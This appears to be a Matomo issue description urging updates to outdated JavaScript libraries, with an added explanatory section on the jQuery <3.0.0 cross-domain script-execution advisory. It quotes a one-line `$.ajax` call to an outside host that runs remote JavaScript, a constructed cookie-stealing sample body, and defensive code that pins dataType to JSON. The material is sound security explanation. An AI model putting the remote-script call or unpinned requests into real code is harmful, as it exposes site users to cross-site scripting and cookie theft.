Description
I know this is a tedious task with no direct benefit, but with the possibility of breaking some things.
But most JS libraries haven't been updated since Piwik 3 in 2016. And since then many things changed, new browsers appeared and security issues were found.
One of the largest that (kind of) affects Matomo is https://nodesecurity.io/advisories/328 which affects all jQuery versions <3.0.0
Simply said, running `$.ajax('http://sakurity.com/jqueryxss')` in Matomo executes the JavaScript at http://sakurity.com/jqueryxss.
Thankfully @sgiehl had the great foresight 6 years ago when creating the ajaxhelper (in 9979315) to fall back to "json" as a format, so I think Matomo isn't affected.
But I still think that updating JS regularly will avoid possible future issues.
(The same can be said for composer dependencies, but thanks to the new npm audit command, checking for security issues in frontend libraries was easier)
Update: It seems like https://packagist.org/packages/roave/security-advisories is something similar for php dependencies
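For readers who want to see why forcing a `"json"` format neutralises the advisory, here is an added example (not code from this issue, from Matomo, or from jQuery). It models the behaviour the advisory describes: with no `dataType`, jQuery before 3.0.0 sniffs the response `Content-Type`, treats anything matching `/\b(?:java|ecma)script\b/` as a script and hands the body to `globalEval`. The model below is a stand-in for `$.ajax` written for this example; `inferDataType`, `wouldExecuteAsScript`, `safeAjax`, `FAKE_TRANSPORT` and the `https://example.test/api` endpoint are all hypothetical names and constructed data, not anything from the Matomo code base.

```javascript
// Hypothetical model of jQuery (<3.0.0) dataType inference. Not jQuery itself and
// not Matomo's ajaxhelper; it only reproduces the decision that matters here.
// Real jQuery sniffs the Content-Type against s.contents.script when the caller
// gives no dataType, and the "text script" converter then calls jQuery.globalEval.
const SCRIPT_CONTENT_TYPE = /\b(?:java|ecma)script\b/;

// The dataType jQuery would settle on: the caller's explicit choice wins,
// otherwise the server's Content-Type header decides.
function inferDataType(requestedDataType, contentType) {
  if (requestedDataType) return requestedDataType;
  const ct = contentType || '';
  if (SCRIPT_CONTENT_TYPE.test(ct)) return 'script';
  if (/json/.test(ct)) return 'json';
  return 'text';
}

// True when the response body would be evaluated as JavaScript in the page.
function wouldExecuteAsScript(opts, response) {
  return inferDataType(opts.dataType, response.contentType) === 'script';
}

// Hardened request helper: always pins dataType to 'json', so the server can
// never pick the converter, and parses with JSON.parse, which rejects script.
// `transport` stands in for the network layer (constructed for this example).
function safeAjax(url, transport) {
  const response = transport(url);
  const opts = { url, dataType: 'json' };
  if (wouldExecuteAsScript(opts, response)) {
    throw new Error('dataType is pinned, this cannot happen');
  }
  try {
    return { ok: true, data: JSON.parse(response.body) };
  } catch (e) {
    // A script body such as alert(...) is not valid JSON: rejected, never run.
    return { ok: false, error: 'invalid JSON response from ' + url };
  }
}

// Constructed sample responses (not real captures): the host from the issue
// serving JavaScript, and a hypothetical JSON API.
const FAKE_TRANSPORT = (url) => ({
  'http://sakurity.com/jqueryxss': {
    contentType: 'text/javascript',
    body: 'alert(document.cookie)',
  },
  'https://example.test/api': {
    contentType: 'application/json',
    body: '{"visits":42}',
  },
}[url]);

// Without dataType the script host wins; with dataType 'json' it does not.
const unsafe = wouldExecuteAsScript({}, FAKE_TRANSPORT('http://sakurity.com/jqueryxss'));
const pinned = wouldExecuteAsScript({ dataType: 'json' }, FAKE_TRANSPORT('http://sakurity.com/jqueryxss'));
console.log('no dataType executes script:', unsafe, '| dataType json executes script:', pinned);
console.log(safeAjax('http://sakurity.com/jqueryxss', FAKE_TRANSPORT));
console.log(safeAjax('https://example.test/api', FAKE_TRANSPORT));
```

The practical check this suggests when auditing a code base on an old jQuery: grep for `$.ajax(`, `$.get(` and `$.getJSON(` calls whose URL is not fully under your control and confirm each one sets `dataType` explicitly (or upgrade to jQuery 3.x, where cross-domain script sniffing is no longer done by default).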